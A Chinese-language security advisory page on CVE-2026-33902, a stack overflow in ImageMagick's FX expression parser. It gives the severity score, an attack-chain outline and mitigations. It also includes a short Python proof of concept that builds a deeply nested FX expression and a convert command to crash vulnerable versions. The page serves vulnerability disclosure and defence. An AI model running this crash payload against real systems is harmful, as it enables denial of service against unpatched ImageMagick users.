CVE-2026-33902 CVSS 5.5 中危

CVE-2026-33902 ImageMagick栈溢出漏洞

披露日期: 2026-04-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33902

漏洞类型

栈溢出

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

ImageMagick

漏洞概述

ImageMagick是一款免费开源的图像编辑软件。在7.1.2-19和6.9.13-44版本之前，FX表达式解析器中存在栈溢出漏洞。攻击者通过提供深度嵌套的表达式可使进程崩溃，该问题已在后续版本中修复。

技术细节

该漏洞存在于ImageMagick的FX（特效）表达式解析模块中。FX表达式用于对图像像素执行复杂的数学运算。由于解析器在处理递归或深度嵌套的函数调用时，未对栈深度进行严格的限制，攻击者可以构造包含极深嵌套层级的恶意表达式。当ImageMagick尝试解析此类表达式时，会消耗过多的栈空间，导致栈溢出。根据CVSS向量（AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H），该攻击需要本地执行且需要用户交互（如打开恶意文件），主要影响是系统可用性，导致服务拒绝。

攻击链分析

STEP 1

侦察

攻击者确认目标系统使用了未修复CVE-2026-33902的ImageMagick版本。

STEP 2

武器化

攻击者构造包含深度嵌套FX表达式的恶意图像文件或命令行参数。

STEP 3

交付

攻击者将恶意文件发送给目标用户，或诱导用户在本地处理该文件。

STEP 4

利用

目标用户使用ImageMagick处理该文件，触发FX解析器的栈溢出。

STEP 5

影响

ImageMagick进程因栈溢出而崩溃，导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os

# Generate a deeply nested FX expression to trigger the stack overflow
# Create a nested string like 'u[u[...[0]...]]'
depth = 10000
nested_expr = "u[" * depth + "0" + "]" * depth

# Command to execute ImageMagick with the malicious expression
# Note: Ensure ImageMagick is installed and vulnerable version is used
image_file = "input.png"
output_file = "output.png"
cmd = f"convert {image_file} -fx \"{nested_expr}\" {output_file}"

print(f"Running command to trigger vulnerability: {cmd[:100]}...")
# os.system(cmd) # Uncomment to execute

影响范围

ImageMagick < 7.1.2-19

ImageMagick < 6.9.13-44

防御指南

临时缓解措施

如果无法立即升级，建议禁用ImageMagick的FX解析功能，或仅在沙箱环境中运行ImageMagick以防止进程崩溃影响宿主机系统。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表